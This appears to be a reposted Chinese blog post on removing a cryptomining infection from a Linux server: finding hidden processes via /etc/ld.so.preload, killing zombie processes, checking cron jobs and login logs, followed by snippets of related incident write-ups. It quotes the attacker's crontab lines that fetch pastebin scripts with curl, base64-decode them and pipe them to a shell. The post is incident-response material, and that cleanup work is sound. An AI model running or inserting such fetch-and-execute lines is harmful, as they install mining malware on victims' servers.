服务器被挖矿

查看哪个进程占据cup

  通过 top 或者使用  ps aux

我这个通过top 命令看不到哪个进程占用了cup ,执行  cat /etc/ld.so.preload 查看,里面也加载了异常的文件,判断是用于隐藏进程用的, 建议将其内容注释掉或删除,执行ldconfig 然后再使用top 查看下进程。

查找进程文件删除  

 ps -ef|grep shutdown [命令]  或者 /proc/4170 [pid]

找出系统中所有的僵尸进程

  ps aux | grep ‘defunct‘  

  或
  ps -ef | grep defunct | grep -v grep | wc -l

清理僵尸进程 

 ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
  或
  kill -HUP `ps -A -ostat,ppid | grep -e ‘^[Zz]‘ | awk ‘{print $2}‘`

查找系统中的定时任务

  crontab -l

  或者

  cd /var/spool/cron  #查看这个文件夹下的文件删除
  vim /etc/crontab

  里面会有一个定时任务我的分别是一下这几个(删除), 浏览器打开网址是个脚本,通过base64 加密,解密即可看到脚本内容

* */10 * * *    /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
 */1 * * * root /bin/sh /bin/httpdns
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

  根据脚本删除脚本创建的文件,我这里删除的是

  /usr/local/lib/libjdk.so ,/etc/ld.so.preload

查看系统登录日志

日志文件 /var/log/wtmp ,系统的每一次登录,都会在此日志中添加记录,为了防止有人篡改,该文件为二进制文件

  cd   /var/log ; last  或者  last -f /var/log/wtmp

原文地址:https://www.cnblogs.com/xuey/p/9566094.html

时间: 2024-08-10 17:10:02

服务器被挖矿的相关文章

记一次服务器被挖矿经历与解决办法

记一次服务器被挖矿经历与解决办法 在最近的某一天里面,中午的一个小息过后,突然手机的邮件和公众号监控zabbix的告警多了起来.我拿起手机一看原来是某台服务器上的CPU跑满了,就开始登上去看一下是哪个脚本导致负荷高的(在期间使用top -d 1命令查看负荷占用情况).可以静下来想了下,中午大家都在休息不应该CPU负载会这么高的,心里想80%是服务器被黑了. 后来发现是/tmp/ddgs.3013和/tmp/qW3xT.2这两个文件跑满了服务器CPU,后来决定先kill掉文件PID和删除/tmp目

阿里云服务器被挖矿怎么解决

春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告.该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议. 在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器被挖矿的情况还是持续性的增长趋势,背后是一些***者利用服务器的漏洞以及网站漏洞进行***服务器,拿到服务器权限,在服务器系统里置入***后门进行挖矿. 下面挖矿的安全报告我们来简要的跟大家分享一下

服务器被挖矿******该怎么处理

正月里来是新年,刚开始上班我们SINE安全团队,首次挖掘发现了一种新的挖矿***,感染性极强,穿透内网,自动尝试***服务器以及其他网站,通过我们一系列的追踪,发现了***者的特征,首先使用thinkphp远程代码执行漏洞,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行***网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行***脚本,注入挖矿***,对一些服务器的远程管理员账号密码,mysql数据库的账号密码进行暴力猜

阿里云服务器被挖矿minerd入侵的解决办法

今天老大手机报警 我检查发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务. 找不到始作俑者,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程 关闭访问挖矿服务器的访问 ip

阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,没有想到我负责的服务器会中这种病毒啊,赶紧的寻找解决的方法.下面是我把minerd给杀掉的过程,希望对大家有帮助. 步骤如下: 1.关闭访问挖矿服务器的访问 [[email protected]~]# iptables -A INPUT -s xmr.crypto-pool

解决阿里云服务器提示挖矿程序风险

今天大早上收到阿里云邮件通知,提示有挖矿程序.一个激灵爬起来,折腾了一早上,终于解决问题了. 其实前两天就一直收到阿里云的通知,检测到对外攻击,阻断了对其他服务器6379. 6380和22端口的访问,当时没怎么当一回儿事,反正是我用来自己学习用的,就放着不管了,结果今天事态就大了.那就来解决吧. 首先xshell连接服务器,这时候输入命令时明显感觉巨卡. 肯定是cpu被占满了,输入 top -c 命令查看有个进程叫 kworkerds.占用了将近100%的CPU. 这 kworkerds 是个啥

解决服务器被挖矿程序攻击导致CPU飙升的问题

通常情况下挖矿程序攻击后导致CPU飙升至80%以上,阿里云cpu监控占比,或者通过命令查看占比 使用top看看cpu占用率,发现sysupdate或networkservice对服务器CPU大量占用的情况 3. 进入proc查看 cd /proc/$PID/       ls -ail进程文件linux目录    发现进程在/etc目录下 4.进入etc目录下,到etc下,除了sysupdate.networkservice 同时还有sysguard.update.sh,除了update.sh其

服务器被挖矿minerd入侵的解决办法

千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个 解决minerd并不是最终目的,主要是查找问题来源. 解决问题思路 1.打开防火墙,添加规则,关闭挖矿minerd的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP 2.查看crond计划任务 crontab -l cd /var/spool/cron/crontab #

阿里云服务器两次被攻击挖矿经历

记录一下最近被服务器被挖矿的经历,如果有道友有类似的情况可以参考.如果你不知道什么事挖矿请自行谷度一下. 就在写这个的昨天晚上手机短信不断报警某个服务器达到了负载阈值,打开服务器top了一下发现4核CPU被其中一个程序跑满了,先记录下这个程序的PID然后根据PID找到源文件/opt/minerd,kill -9干掉这个进程,然后删掉文件. 1.CPU占用被陌生程序跑满; 2.程序名一般为minerd , yam 等等 3.根据PID找到文件 ll /proc/PID 程序干掉之后没多一会又收到报